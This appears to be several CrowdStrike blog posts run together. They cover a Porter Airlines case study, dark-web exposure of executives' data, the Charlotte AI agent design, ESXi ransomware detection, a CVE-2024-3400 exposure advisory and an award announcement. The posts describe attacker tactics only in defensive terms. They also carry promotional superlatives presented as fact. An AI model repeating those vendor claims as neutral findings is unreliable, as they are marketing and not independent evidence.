All passengers on Porter Airlines travel in style with complimentary beer and wine, free premium snacks, free WiFi, free inflight entertainment, no middle seats — the list goes on. 

With these perks, it’s no wonder Porter is growing fast. Headquartered in Toronto, Porter revolutionized short-haul flying in 2006. Since then, the airline has stretched its wings, amassing 58 aircraft, 3,200 employees and 33 destinations across North America. 

Early success has only fueled the company’s ambitions. Porter plans to double its workforce by 2026 and blanket all major U.S. cities and beyond. While this growth brings exciting business opportunities, it also creates new cybersecurity challenges, as the company piles on more data, devices and attack surfaces to protect. 

“When we started, we weren’t really a target for attackers, but we’re seeing more activity today,” said Jason Deluce, Director of Information Technology at Porter Airlines. 

To secure its growing business, Porter relies on the AI-native CrowdStrike Falcon platform and CrowdStrike Falcon® Complete for 24/7 managed detection and response (MDR). This is the story of how CrowdStrike delivers the flexible and scalable cybersecurity that Porter needs to secure its business today and into the open skies ahead.  

New Security Requirements

The move to CrowdStrike was born out of necessity. Porter’s previous security stack centered on a noisy endpoint detection and response (EDR) solution. Alerts overwhelmed Deluce’s lean security team, and the vendor wasn’t much help. Then, after three years without contact, the sales rep dropped a high renewal bill. 

Porter used a separate cybersecurity platform for vulnerability management and log management. But according to Deluce, “it was all manual. It detects vulnerabilities, but it doesn’t do anything about them. That wasn’t enough for us.” 

Furthermore, none of the solutions were integrated, leaving Deluce and his team with multiple agents and multiple consoles to operate. “They kind of talk about the same thing, but there’s nothing to marry them together in one place. You have to go to separate places, try to make sense of the data and determine if it’s accurate or not.”

With the business taking off and cyber threats surging, Porter needed a modern cybersecurity platform to reduce the noise and stop breaches. With its single-agent, cloud-native architecture, the Falcon platform gave Porter exactly what it needed: one agent and one console for complete visibility and protection across the company’s expanding security estate.

And whereas the previous cybersecurity vendors left Deluce with more questions than answers, Falcon Complete MDR acts as a force multiplier for Porter’s security team, providing around-the-clock expert management, monitoring, proactive threat hunting and end-to-end remediation, delivered by CrowdStrike’s team of dedicated security experts. 

Stopping Breaches in the Cloud with the Falcon Platform

A few years back, Porter made the strategic move to use Amazon Web Services (AWS) for hosting its business applications and corporate data. While this cloud strategy delivers the scalability and flexibility Porter needs to grow, it also introduces new security risks.

With the lightweight Falcon agent already deployed, Deluce was able to easily add CrowdStrike Falcon® Cloud Security to its arsenal of protections. And because CrowdStrike and Amazon are strategic partners with many product integrations, deployment was a breeze. 

“The one-click deployment is pretty amazing,” said Deluce. “We were able to deploy Falcon Cloud Security to a bunch of servers very quickly.”

Falcon Cloud Security is the industry’s only unified agent and agentless platform for code-to-cloud protection, integrating pre-runtime and runtime protection, and agentless technology in a single platform. Being able to collect and see all of that information in a single console provided immediate value, according to Deluce. 

Porter soon looked to expand its cloud protections with CrowdStrike Falcon® Application Security Posture Management (ASPM). While evaluating the product, Deluce gained visibility into dependencies, vulnerabilities, data types and changes his team previously had no visibility into, ranging from low risk to high risk. The company moved fast to deploy Falcon ASPM. 

With ASPM delivered as part of Falcon Cloud Security, Porter gets comprehensive risk visibility and protection across its entire cloud estate, from its AWS cloud infrastructure to the applications and services running inside of it — delivered from the unified Falcon platform. 

Better Visibility and Protection

Porter has deployed numerous CrowdStrike protections to fortify the airline against cyber threats. Recently, that included CrowdStrike Falcon® Identity Protection to improve visibility of identity threats, stop lateral movement and extend multifactor authentication (MFA). 

Deluce noted that previously, he had no easy way of knowing about stale accounts or service accounts. He’d have to do an Active Directory dump and go through each line to see what was happening. With Falcon Identity Protection, Deluce saw that Porter had over 200 privileged accounts, which didn’t add up, given his small number of domain admins. 

“I saw that a large group had been given print operator roles, which would have allowed them to move laterally to domain admins,” noted Deluce. “With Falcon Identity Protection, I was able to change those permissions quickly to reduce our risk. I also started enforcing MFA from the solution, which is something I couldn’t do before with the products we had.”

Gaining better visibility has been an important theme for Porter. The company also uses CrowdStrike Falcon® Exposure Management to gain comprehensive visibility to assets, attack surfaces and vulnerabilities with AI-powered vulnerability management.  

“We’re taking on new vendors faster than we’re taking on airplanes, so we need to limit our exposures,” said Deluce. “With Falcon Exposure Management, I can scan our digital estate to see which assets we have exposed to the internet, as well as any exposures belonging to our subsidiaries and partners, so we can reduce those risks.” 

The solution provided quick value when Deluce noticed one of his APIs was exposed to the internet, which shouldn’t have been the case. He also found that many of the assets connected to the company’s network belonged to third parties, which is a major risk, given that any attack against those devices could affect Porter. 

“Falcon Exposure Management shows us our vulnerabilities and exposures, and how we can reduce them,” said Deluce. “This is key as we continue to build out the company and expand our partner network.”

Securing the Future with CrowdStrike

Safety is paramount to airlines — and that includes keeping customer data safe. With its investment in CrowdStrike, Porter is demonstrating its commitment to safety and security. 

But for cybersecurity leaders like Deluce, the work is never done. Adversaries continue to get bolder, faster and stealthier. To stay ahead of evolving threats, Porter continues to lean into CrowdStrike, recently testing Charlotte AI and CrowdStrike Falcon® Adversary Intelligence, among other capabilities designed to help teams work faster and smarter.

Deluce reflected on how far the company has come in its cybersecurity journey and the role that security plays in enabling future growth. 

“We’ve gone from multiple tools, high complexity and spending a lot for poor visibility to a single pane of glass where we can do a bunch of new things with one platform,” concluded Deluce. “Cybersecurity is key to scaling the company and we know CrowdStrike is there for us.”

Additional Resources

• CrowdStrike was named a Leader in the 2023 Gartner® Magic Quadrant for Endpoint Protection Platforms — read more in this blog: Furthest Right in Vision. Highest in Ability to Execute. Only CrowdStrike.
• To learn what other industry analysts are saying about CrowdStrike, visit the Industry Recognition webpage.
• Test CrowdStrike next-gen AV for yourself with a free trial of CrowdStrike Falcon® Prevent.

Organizations  are increasingly concerned about high-profile employees’ information being exposed on the deep and dark web. The CrowdStrike Counter Adversary Operations team is often asked to find fake social media accounts and personally identifiable information (PII) that might be exposed.

Impersonations and leaked PII can unravel lives and ruin the reputations of individuals and their organizations. Through surface, deep and dark web monitoring, CrowdStrike is able to provide timely alerts to our customers, helping them take quick action to mitigate the potential damage caused by these posts.

The CrowdStrike Counter Adversary Operations team has created thousands of monitoring rules that protect our customers, and nearly 20% of them focus solely on high-profile employees. In this blog, we break down the data source categories that generate the most actionable notifications — including the type of data being posted — and name the actors that are posting most frequently on those sites.

CrowdStrike Counter Adversary Operations Analysis

The analysis and graph below represent only the true positive notifications from the Counter Adversary Operations team. A true positive notification is one that has been determined to be malicious in nature and actionable for customers.

By analyzing true positive notifications, we can identify the top actionable sources and their effects on organizations.

Actionable Source Types

Chat Mediums 

The most common chat site with true positives seen in our monitoring is Telegram. 

Telegram included data that could be used to target high-profile employees and potentially their organizations. Telegram, unlike other sites, is not the most directly targeted source — high-profile employee data is found within the site, but this data is within combined lists of millions of other people’s data, so it is unlikely the author knows they have captured the sensitive data of high-profile employees. Otherwise, actors would individualize the credentials for purchase at a premium price. The majority of the sensitive data identified within Telegram includes email addresses and passwords for third-party applications. Although this does not directly tie into targeting high-profile employees to undermine their companies’ technical infrastructure, if these employees use the same password for their personal and corporate accounts, it can have catastrophic consequences.

There are numerous authors on Telegram posting what we would classify as true positive notifications for high-profile employees. These notifications typically include email and password combinations that are currently being used by the high-profile employees.

Criminal Marketplaces 

Like Telegram, criminal marketplaces include data that could have an immediate impact on high-profile employees. Specifically, the majority of the exposed data on criminal marketplaces comes from multiple large breaches of credit card information, and threat actors look to sell credit card data individually and indiscriminately. Threat actors parse the data individually by credit card owner name and list each one for sale, typically for less than $1 USD.

Threat actors do not appear to do research based on the accounts they are selling, which leads us to believe that bot farms are being used to perform automated collection. For instance, if a threat actor knew they had a working credit card — along with the purchasing information of a CEO or high-ranking official — they would likely either raise the price for that individual or attempt to further exploit the information.

“Carder Market” is a broker site that sells exposed credit card information, including the PII data needed to make online transactions. The site is nondiscriminatory and lists all accounts available after a purchase of $0.25 USD. This alludes to bot behavior, which is confirmed when attempting to identify the perpetrators — in this case, the perpetrator is one account identified as “Admin.” Though accounts are indiscriminately posted, high-profile employees could be targeted by searching for a specific name and suspected home of record within the data.

Public Repositories 

Unlike chat mediums and criminal marketplaces, public repositories include highly targeted information. On public repositories, Counter Adversary Operations observed data of three types of high-profile employees: government officials, influential figures and C-suite personnel. The exposed PII included residence addresses, phone numbers, IP addresses, Social Security numbers, personal email addresses, detailed credit card information (including expiration date and security code) and vehicle plate numbers.

With the abundance of information included on these sites, bad actors have a higher potential to exploit high-profile employees either by harassing them or using their credit card/SSN information.

The public repositories we observed included Doxbin, Pastebin and GitHub. All three public repositories  allow users to post anonymously (and high-profile employee material was posted anonymously), allowing bad actors to easily obfuscate themselves and their intentions. 

Forums 

Malicious forum posts observed by our team are largely used to create and spread conspiracy theories or make derogatory statements related to individuals who have high name recognition. These posts are meant to degrade the reputation of an individual, but we rarely see posts containing sensitive data that could compromise the individual’s corporate credentials. 

For this category, the source that generated the most true positive notifications is 4chan. All true positive notifications on 4chan are posted under anonymous accounts. These posts are not limited to PII, as with other source categories. Many 4chan posts concerning high-profile employees are antisemitic in nature and usually end up being linked to an existing conspiracy theory. Something that is also unique to 4chan is the posts almost always target CEOs and additional executive employees.

Counter Adversary Operations has witnessed cyber threats turn into physical acts of targeting on 4chan. For example, our team observed a political discourse that devolved into the author posting their disagreement with an individual’s political views, resulting in a call to arms where the home of the individual was targeted by a picket line.

Social Media 

Social media sites also included targeted notifications where actors directly targeted high-profile individuals. However, this medium is less prone to data leaking than public repositories. Social media posts include direct harassment of individuals — in most cases, the harassment revolves around a political discourse that led to hate speech from individual actors. Unlike chat mediums, which can be listed privately, social media sites reach a higher swath of application users, and author discourse appears to be a popular topic to gain notice. 

The most common site on which Counter Adversary Operations observed this behavior was X (formerly Twitter). Counter Adversary Operations has aided customers in preparing documentation to take down X profiles that are attempting to impersonate high-profile employees’ accounts. These impersonating accounts used employees’ profile photos and names, making them more convincing.

The takedown process for social media accounts requires ample evidence of malicious behavior, not just the use of a name and photo. This can create a barrier for the affected user in getting the account taken down.

How CrowdStrike Counter Adversary Operations Can Help

CrowdStrike Falcon® Adversary Intelligence enables customers to monitor these sites and immediately alerts customers when activity against a high-profile employee is detected. And because CrowdStrike Counter Adversary Operations works with surface, deep and dark web data every day, the team knows which sites to focus on and which are less concerning. CrowdStrike offers an option to add an assigned Counter Adversary Operations analyst to help customers hunt for external threats to brands, employees and sensitive data, allowing their cyber professionals to devote their time to handling actionable data rather than hunting through a complex and ever-changing criminal ecosystem.

Additional Resources

• Watch this short demo to see how Falcon Adversary Intelligence enables organizations to proactively uncover fraud, data breaches and phishing campaigns to protect their brand from online threats that target their organization.
• To find out more about how to incorporate threat intelligence into your security strategy, visit the CrowdStrike Falcon Adversary Intelligence page.
• Read about the cybercriminals tracked by CrowdStrike Counter Adversary Operations in the CrowdStrike 2024 Global Threat Report.
• Request a free trial of the industry-leading CrowdStrike Falcon® platform.

Over the last year there has been a prevailing sentiment that while AI will not necessarily be replacing humans, humans who use AI will replace those that don’t. 

This sentiment also applies to the next era of cybersecurity, which has been rapidly unfolding over the last year. Recent breakthroughs in generative AI hold enormous promise for modern defenders. Amid the dual pressures of accelerating attacks — down to just over two minutes, in some instances — and persistent skills shortages, generative AI has the potential to be not just an accelerator, but a veritable force-multiplier for teams of all sizes and maturity levels. We’ve seen these impressive gains firsthand working with early adopters of Charlotte AI (made generally available last month), with users reporting speed gains of up to 75% across supported workflows. 

Making humans as effective and efficient as possible begins with giving them the best tools for the job. Today’s AI landscape presents organizations with a rapidly growing and often dizzying landscape of foundational models developed by the open-source community, startups and large enterprises. Each model is unique in its strengths and applications, varying in speed, accuracy, training data, computational intensiveness and in the underlying risks they pose to end-users. Invariably, selecting just one model, or one family of models, can force users to accept trade-offs across any one of these variables.

Security teams shouldn’t have to compromise on the tools they use to protect their organizations. In an ideal world, their tools should support the maximum levels of speed and accuracy required across the myriad workflows they oversee, without trade-offs on performance and risk — and without placing the burden on defenders to calculate computational complexity.

This is one of the foundational principles on which we’ve designed Charlotte AI. To optimize Charlotte AI’s performance and minimize the drawbacks of using individual models, we’ve architected Charlotte AI with a multi-AI system; one that partitions workflows into discrete sub-tasks and enables our data scientists to isolate, test and compare how effectively different models perform across tasks. This approach enables our experts to dynamically interchange the foundational models applied across workflows, ensuring end-users can interact with an ever-improving AI assistant fueled by the industry’s latest generative AI technologies. 

Charlotte AI’s multi-AI design is singular across the cybersecurity landscape, applying cutting-edge system design from the front lines of genAI research to CrowdStrike’s unsurpassed data moat of award-winning threat intelligence, cross-domain platform telemetry and over a decade of expert-labeled security telemetry. In this blog, we shed light on how it comes together.

Under the Hood: From Question to Answer with AI Agents

Charlotte AI enables users to unleash the transformative power of generative AI across security workflows. With a simple question, users can activate Charlotte AI to answer questions about their environments, generate scripts or analyze emerging threat intelligence; all grounded in the high-fidelity telemetry of the Falcon platform. Charlotte AI’s natural processing capabilities lower the level of skill and experience needed to make quick, accurate security decisions, while enabling even seasoned analysts to unlock incremental speed gains across every stage of their workflows — from surfacing time-sensitive detections, to investigating incidents to taking action with Real Time Response. 

Under the hood, Charlotte AI orchestrates over a dozen task-oriented “AI agents” to interpret a user’s question, plan the steps required to assemble a complete answer and structure the end result (Figure 1). Each AI agent is a subsystem consisting of a model and surrounding code that enables it to perform specific tasks and interact with other agents. One can think of each AI agent’s LLM (or other class of underlying model) as its “brain,” and each agent’s unique functionality (enabled by its surrounding code) as the skills that enable it to execute specific tasks. 

We can think of these AI agents much like the team of doctors working in concert in an operating theater, each overseeing specialized tasks; from administering anesthesia to operating on acute areas of focus. Similarly, each AI agent has a specific responsibility and area of expertise. Much like an operation that requires a team of specialists to collaborate, Charlotte AI’s dynamic task force of AI agents work together to support a growing number of workflows; from summarizing threat intelligence, to writing queries in CrowdStrike Query Language (CQL), to assisting incident investigations. 

At a high level, Charlotte AI activates AI agents to structure answers in the following sequence: 

• Step 1: Understand the Question: Charlotte AI first activates AI agents tasked with understanding the user’s conversation context and extracting entities referenced in the question — such as threat actors, vulnerabilities or host features.
• Step 2: Route Subtasks to AI Agents: Charlotte AI then activates a router agent, which determines which AI agent or agents to assign the user’s request. 
• Step 3a: Scan for Answers: If a user asks a question that requires data from one or more API calls, the request is passed to a dedicated agent within Charlotte AI that ensures the information is retrieved and available for further processing. 
• Step 3b: Plan Responses for Questions: If the user’s question doesn’t map to one or more API calls — for example, when asking Charlotte AI to generate a CQL query — Charlotte AI’s router agent can activate a number of other AI agents fine-tuned to accomplish specific tasks.
• Step 4: Validate the Plan and Retrieved Data: The runtime agent executes the API calls outlined by the prior AI agent. The output of this process is then reviewed by a validation agent, which determines whether the resulting information is complete or requires additional information. This AI agent may even issue a warning to the end user if the answer is incomplete.
• Step 5: Generate an Answer: A final AI agent structures the response to the user’s question, taking into account intuitive ways of presenting information to the end user and generating a summary of information presented. 

Guardrails against LLM Overexposure  

Systems that give users direct visibility to the output of LLMs (often referred to as “naked LLMs”) risk exposing users to inaccurate information when LLMs perform unexpectedly or hallucinate — a phenomenon where LLMs provide information that is not supported by, or even contradicts, source data. Inaccurate information can have devastating implications in security, ranging from impeded productivity, to a weakened security posture, to a major breach. 

Charlotte AI’s multi-AI architecture plays a critical role in enabling a safe user experience, providing buffers that insulate end-users from the direct output of LLMs. First, by having the flexibility to apply diverse models across workflows, Charlotte AI enables CrowdStrike’s data science team to limit the ripple effects of unexpected changes in performance stemming from any one model. Another way Charlotte AI buffers users against direct LLM exposure is by using an agent tasked with validating answers before they are presented to end-users, verifying that answers are both consistent with the type of result the user is expecting and grounded in Falcon platform data. 

Turbocharging Security Workflows: From Answer to Action 

As large language models reach new levels of maturity and commoditization, security teams face a growing landscape of conversational AI assistants. Charlotte AI’s multi-AI architecture enables users to tap into the power of today’s best-of-breed foundational models and cutting-edge innovations across their workflows while minimizing the trade-offs of limiting their selection to any one model or model family. This architectural adaptability enables Charlotte AI to continuously elevate every analyst to new heights of efficiency, equipping them with the insight they need to make faster, more accurate decisions and reclaim a speed advantage against modern adversaries. For a deeper look at Charlotte AI’s architecture, download the white paper: “The Best AI for the Job: Inside Charlotte AI’s Multi-AI Architecture.”

Next Steps: 

• Download the white paper: Learn more about Charlotte AI’s multi-AI architecture.
• Register for the Unstoppable Innovations Series: Hear how early adopters of Charlotte AI are turning hours of work into just minutes or even seconds. Register for the series. 
• Learn more: Visit the Charlotte AI product page. 

• CrowdStrike Falcon® Next-Gen SIEM enables companies to search, investigate and hunt down threats, including detection of advanced ransomware targeting VMware ESXi 
• Initial access to the ESXi infrastructure¹ is typically gained through lateral movement using valid credentials
• eCrime actors target and deploy ransomware in ESXi environments to increase the impact and scale of their attacks, which can be devastating for organizations

CrowdStrike Falcon Next-Gen SIEM, the definitive AI-native platform for detecting, investigating and hunting down threats, enables advanced detection of ransomware targeting VMware ESXi environments. 

CrowdStrike has observed numerous eCrime actors exploiting ESXi infrastructure to encrypt virtual machine volumes from the hypervisor to deploy ransomware in organizations. Access to ESXi infrastructure typically takes place as part of lateral movement. For example, SCATTERED SPIDER often gains initial access to a Microsoft Entra ID identity via social engineering and then uses this identity to access internal information repositories such as SharePoint to search for ESXi related credentials. 

CrowdStrike refers to this tactic to deploy ransomware as “Hypervisor Jackpotting,”² as eCrime actors can  use ESXi hosts to rapidly expand the scope of affected systems.

Falcon Next-Gen SIEM can ingest ESXi logs to reveal evidence of attacker activity, detect suspicious behavior related to use of encryption commands and tooling in near-real time, audit configuration changes and events indicative of early signs of pre-ransomware activity, and detect logins from malicious IP addresses to create and raise incidents for investigation. 

Here, we provide an overview of how Falcon Next-Gen SIEM detects ransomware targeting ESXi environments.

Start With Log Forwarding and Configuration

Forwarding ESXi logs to Falcon Next-Gen SIEM can help detect ransomware targeting ESXi environments. By ingesting and alerting on authentication and shell logs that ship with ESXi, we can find evidence of attackers gaining interactive shell access to the ESXi servers, running basic enumeration commands, shutting down virtual machines and using built-in tools like openssl to encrypt the virtual machine volumes.

We recommend using a syslog aggregation point, like the CrowdStrike® Falcon LogScale Collector, to forward logs to Falcon Next-Gen SIEM. Detailed instructions for doing this can be found in the CrowdStrike Tech Center.³

Once your log collector is set up, you can configure the ESXi infrastructure to forward the logs to your log collector. The default configuration for syslog for VMware ESXi 7.x and VMware vCenter 7.x is sufficient to get the correct logs to the unified, AI-native CrowdStrike Falcon® platform. You can find the instructions on how to enable remote syslog forwarding in VMware’s knowledge base.⁴

Detect the Use of Built-In Encryption Tools

Most of the activity prior to the encryption of critical virtual machine guest files could potentially be normal behavior like listing and shutting down virtual machines. These are important events to capture in an incident, but they are not indicative of an attack on their own. 

To create a detection, we need to identify an event with a high enough confidence. The use of a tool like openssl with the encrypt option (enc) being run from the command line on critical guest virtual machine files is a high-confidence event that indicates something malicious is happening in our environment. 

Falcon Next-Gen SIEM will detect this activity in near real time and create an incident for you. It will also gather surrounding activity that has happened on that host and include it in the incident.

 

In this detection, we see the use of openssl to encrypt sensitive files, the SSH connection, some virtual machine enumeration and the virtual machines being shut down before encryption.

Gain Insights Into Early Ransomware Signs

Detecting an in-progress attack within your environment is critical, but it is always better to get insights into a pending attack before it starts. We can look for configuration changes to an environment, especially those that don’t comply with best practices or that degrade the security posture of the environment. 

One easily detectable signal would be if a user enables SSH on one of your servers running ESXi. In a best-case scenario, this is an auditable event that the security team can confirm is legitimate behavior. In a worst-case scenario, it is the first tip that someone has compromised your ESXi infrastructure. We can easily surface this activity by creating a scheduled search looking for the specific indicator. Running it on a short interval with an overlapping time period will ensure we get timely notifications without missing events. 

Reveal Unauthorized Logins from Malicious IP Addresses

Another indicator of a pending attack is the detection of logins to the ESXi management console that come from known malicious IP addresses where the console is purposely or accidentally exposed to the internet. Falcon Next-Gen SIEM leverages CrowdStrike’s integrated threat intelligence to identify any known indicators of compromise (IOCs) in critical data. By combining this with the ESXi login entries sent to the Falcon platform, we can detect the login attempts from known malicious sources.

CrowdStrike Falcon Next-Gen SIEM Exposes Ransomware Targeting ESXi 

By leveraging Falcon Next-Gen SIEM, you can provide your organization with multiple layers of detections, get unparalleled visbility into your ESXi infrastructure and get ahead of adversaries. Falcon Next-Gen SIEM leaves adversaries targeting ESXi environments with nowhere to hide, detecting suspicious behavior as early as possible, preventing attacks and stopping breaches.

Additional Resources

• Learn how to stop breaches with Falcon Next-Gen SIEM by visiting the webpage.
• Join our next biweekly next-gen SIEM showcase to view a live demo of Falcon Next-Gen SIEM.
• Download the CrowdStrike eBook, 8 Things Your Next SIEM Must Do, to understand the critical capabilities to look for when evaluating SIEM solutions.
• See Falcon LogScale in action by watching this fast-paced demo.

Sources

1. https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/
2. https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
3. https://www.crowdstrike.com/blog/tech-center/importing-logs-log-collector/
4. https://kb.vmware.com/s/article/2003322

UPDATE: It has been confirmed that disabling telemetry will not block this exploit. Applying a patch as soon as possible is the most effective remediation for this vulnerability. Patches for 8 of the 18 vulnerable versions have been released; patches for the remaining vulnerable versions are expected by April 19th.

CrowdStrike is constantly working to protect our customers from the newest and most advanced cybersecurity threats. We are actively monitoring activity related to CVE-2024-3400, a critical command injection vulnerability in the GlobalProtect feature of Palo Alto Networks’ PAN-OS software affecting “specific PAN-OS versions and distinct feature configurations,” the vendor says.

This vulnerability, which has been given a CVSSv4.0 score of 10 by the vendor, has been observed being exploited in the wild. If exploited, CVE-2024-3400 could allow an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. At the time of writing, there is no patch available. Palo Alto Networks says a patch will be ready by April 14, 2024. 

Here, we explain how customers of the CrowdStrike Falcon® platform can assess their risk exposure to this vulnerability. Customers should also monitor the vendor’s website for up-to-date information on vulnerable product versions, mitigations and available patches.

Assessing Risk Exposure to CVE-2024-3400

When a new and actively exploited vulnerability is reported, one of the first actions security teams must take is determining their exposure to the issue. Understanding which of their internet-exposed assets could potentially be affected by the vulnerability is the first step to understanding exposure — and clear visibility into internet-facing devices is essential.

After identifying potentially vulnerable assets, the next step is to understand if the exposed assets have the required conditions for the vulnerability to be present. 

According to the vendor information, some of the most recent PAN-OS versions (listed below) are affected. An asset will be affected if the GlobalProtect gateways and device telemetry are enabled. If these features are not enabled, this vulnerability cannot be exploited.

Version	Vulnerable Version	Fixed Version	Estimated Patch Release Date
PAN-OS 11.1.2	Less than 11.1.2-h3	11.1.2-h3	04/14/2024
PAN-OS 11.1.1	Less than 11.1.1-h1	11.1.1-h1	04/16/2024
PAN-OS 11.1.0	Less than 11.1.0-h3	11.1.0-h3	04/16/2024
PAN-OS 11.0.4	Less than 11.0.04-h1	11.0.04-h1	04/14/2024
PAN-OS 11.0.3	Less than 11.0.03-h10	11.0.03-h1	04/16/2024
PAN-OS 11.0.2	Less than 11.0.02-h4	11.0.02-h4	04/16/2024
PAN-OS 11.0.1	Less than 11.0.01-h4	11.0.01-h4	04/17/2024
PAN-OS 11.0.0	Less than 11.0.00-h3	11.0.00-h3	04/18/2024
PAN-OS 10.2.9	Less than 10.2.9-h1	10.2.9-h1	04/14/2024
PAN-OS 10.2.8	Less than 10.2.8-h3	10.2.8-h3	04/15/2024
PAN-OS 10.2.7	Less than 10.2.7-h8	10.2.7-h8	04/15/2024
PAN-OS 10.2.6	Less than 10.2.6-h3	10.2.6-h3	04/16/2024
PAN-OS 10.2.5	Less than 10.2.5-h6	10.2.5-h6	04/16/2024
PAN-OS 10.2.4	Less than 10.2.4-h16	10.2.4-h16	04/19/2024
PAN-OS 10.2.3	Less than 10.2.3-h13	10.2.3-h13	04/17/2024
PAN-OS 10.2.2	Less than 10.2.2-h5	10.2.2-h5	04/18/2024
PAN-OS 10.2.1	Less than 10.2.1-h2	10.2.1-h2	04/17/2024
PAN-OS 10.2.0	Less than 10.2.0-h3	10.2.0-h3	04/18/2024

Table 1. PAN-OS versions vulnerable to CVE-2024-3400

CrowdStrike Falcon Exposure Management customers can quickly identify exposed PAN-OS assets in their environments by filtering directly from the external attack surface management capability. This will help customers quickly identify all of the potential exposures, thereby proactively reducing the impact of a potential exploitation.

Filter	Value	Expected Result
Banner	GlobalProtect	All devices that return a GlobalProtect Banner
Platform	PAN-OS	All devices that are on a PAN-OS platform

Table 2. Falcon Exposure Management query filters to detect CVE-2024-3400

NOTE: The two filters listed above should be used independently as using them in tandem will likely net 0 results.

As pictured below, Falcon Exposure Management customers can broaden their search for all Palo Alto Networks devices by selecting the platform “PAN-OS,” enabling them to locate firewalls running the vulnerable version of GlobalProtect.

How Many Assets Could Be Affected?

Customers of CrowdStrike Falcon® Counter Adversary Operations who would like to identify the total number of potentially vulnerable internet-exposed assets can navigate to “External attack surface explore” located in the “External monitoring” section of the Counter Adversary Operations menu. There, they can use some of the following filters to view other PAN-OS assets visible on the broader internet:

Query	Expected Result
attributes_raw contains (Phrase) ‘Palo Alto Networks PA-200 series’ or banners_raw contains (Phrase) ‘GlobalProtect Portal’	Returns any device whose attributes contain the phrase “Palo Alto Networks PA-200 series” or returns the phrase “GlobalProtect Portal” in the HTML banner
platform.name contains (Phrase) ‘Pan-os’	Returns any device with “PAN-OS”‘ in its platform name
‘cpe:/a:paloaltonetworks:pan-os’	Returns any device that is noted as having PAN-OS installed

Table 3. Queries for detecting possible vulnerable assets in “External attack surface explore,” an external monitoring feature in Counter Adversary Operations

Conclusion and Recommendations

Critical vulnerabilities, especially those actively exploited, pose a high risk to organizations. In order to mitigate the risk of exploitation, those affected by CVE-2024-3400 are advised to update vulnerable appliances with the vendor-supplied patch. Patches for 8 of the 18 vulnerable versions have been released, and patches for the remaining vulnerable versions are expected by April 19th. In addition, it is advised to increase monitoring of vulnerable appliances as well as non-vulnerable assets potentially accessible by the appliance.

Our product and internal security teams continue to actively monitor this dynamic and ongoing situation. CrowdStrike will continue to take additional steps, including mitigation and patching. As new information becomes available, we will publish updates as necessary. In tandem, we continue to develop and release new behavioral logic for the Falcon platform to detect and prevent malicious behavior related to CVE-2024-3400. 

Additional Resources

• See Falcon’s unrivaled protection in action in a short demo.
• Learn about our threat intelligence and hunting subscriptions.
• Experience how the industry-leading CrowdStrike Falcon® platform protects against modern threats. Start your 15-day free trial today.

• CrowdStrike wins third consecutive Best Endpoint Detection and Response 2024 Award from SE Labs
• The award recognizes that the CrowdStrike Falcon® platform demonstrates consistent results in detecting real-world adversary tradecraft, both in SE Labs testing and in real-world scenarios
• CrowdStrike remains committed to participating in independent testing that provides transparency into the Falcon platform’s AI-native detection and automated prevention capabilities 

The CrowdStrike Falcon platform has received the Best Endpoint Detection and Response 2024 Award from SE Labs for the third consecutive year. This award honors CrowdStrike’s leadership in demonstrated detection, prevention and investigation capabilities. This repeat performance is made possible by CrowdStrike’s unified, AI-native platform, which delivers unsurpassed protection through a single lightweight agent and console, fueled by CrowdStrike’s petabytes of cross-domain intelligence and award-winning threat intelligence and advanced AI and machine learning capabilities. The recognition also highlights our continued commitment to transparency in public testing.

In describing the significance of this award, SE Labs notes:

“The best security involves having a good understanding of your enemy and the extent of the impact they could make (or have already made) on your IT infrastructure. Endpoint Detection and Response are the boots on the ground when it comes to seeing, stopping and investigating cyber threats on the network. A great solution makes it easier for security teams to be more effective.”

The SE Labs Best Endpoint Detection and Response 2024 Award reflects CrowdStrike’s consistent, year-long testing results in detecting real-world attacker behavior with the highest protection accuracy during SE Labs EDR tests. In the ransomware-specific testing, the Falcon platform detected and blocked all attacks to achieve a 100% ransomware protection score.

In addition, as part of this award, SE Labs incorporates results reported by customers. To earn this third straight win, the Falcon platform showed that it delivers best-in-class results during sophisticated lab-based testing and in real-world engagements. From ransomware to sophisticated attack chains, the Falcon platform defends against attacks at every stage, neutralizing adversaries.

An Adversarial Approach to Testing Endpoint Detection and Response

SE Labs Endpoint Detection and Response testing involves using current threat intelligence on known and relevant adversaries to build similar attack chains in a practice known as adversary emulation. This involves replicating tradecraft from sophisticated adversaries such as Turla, Ke3chang, Threat Group-3390 and Kimsuky to make test cases as similar as possible to real-life engagements. The intent behind these attacks is to infiltrate systems and breach target networks, realistically mirroring the methods that adversaries use to compromise systems. 

Ransomware is a big part of SE Labs’ testing. It inflicts damages totaling billions of dollars and it’s increasingly used for extortion by big game hunting (BGH) adversaries — the number of data theft victims named on BGH dedicated leak sites spiked by 76% year-over-year in 2023, as detailed in the CrowdStrike 2024 Global Threat Report.

It is critical to test EDR vendors’ ability to detect the tactics of cybercriminal ransomware groups, as well as known and unknown ransomware. By creating attack chains that replicate tactics — such as the use of stolen identities or lateral movement — and using ransomware samples employing typical methods like phishing, these ransomware-specific EDR tests are meant to evaluate whether security vendors can detect and protect businesses against real-world scenarios.

Throughout 2023, SE Labs included realistic adversary tradecraft in its EDR attack chains, as well as real-world tactics used by ransomware operators, to evaluate detection and prevention capabilities. The ransomware-specific test involved 615 ransomware variants from 10 different ransomware families being employed in sophisticated attacks mimicking the tradecraft of real-world adversaries.

The SE Labs Best Endpoint Detection and Response 2024 Award stands as a unique accolade in the industry, recognizing practical success in seeing, stopping and investigating advanced threats by understanding adversary behaviors.

Additional Resources

• CrowdStrike was named a Leader in the 2023 Gartner® Magic Quadrant for Endpoint Protection Platforms — read more in this blog: Furthest Right in Vision. Highest in Ability to Execute. Only CrowdStrike.
• To learn what other industry analysts are saying about CrowdStrike, visit the Industry Recognition webpage.
• Test CrowdStrike next-gen AV for yourself with a free trial of CrowdStrike Falcon® Prevent.

Two recent Microsoft breaches underscore the growing problem of cloud identity attacks and why it’s critical to stop them. 

While Microsoft Active Directory (AD) remains a prime target for attackers, cloud identity stores such as Microsoft Entra ID are also a target of opportunity. The reason is simple: Threat actors increasingly seek to mimic legitimate users in the target system. They can just as easily abuse identities from cloud identity providers as they can in on-premises AD environments.

Identity providers and Zero Trust network access solutions offer some capabilities to prevent cloud identity attacks — however, they often lack visibility across the identity landscape spanning on-premises and cloud identity providers, creating gaps that adversaries can exploit.

This blog shares how the failure to secure cloud identities can result in a breach and how recently released innovations in CrowdStrike Falcon® Identity Protection can stop identity attacks in the cloud.

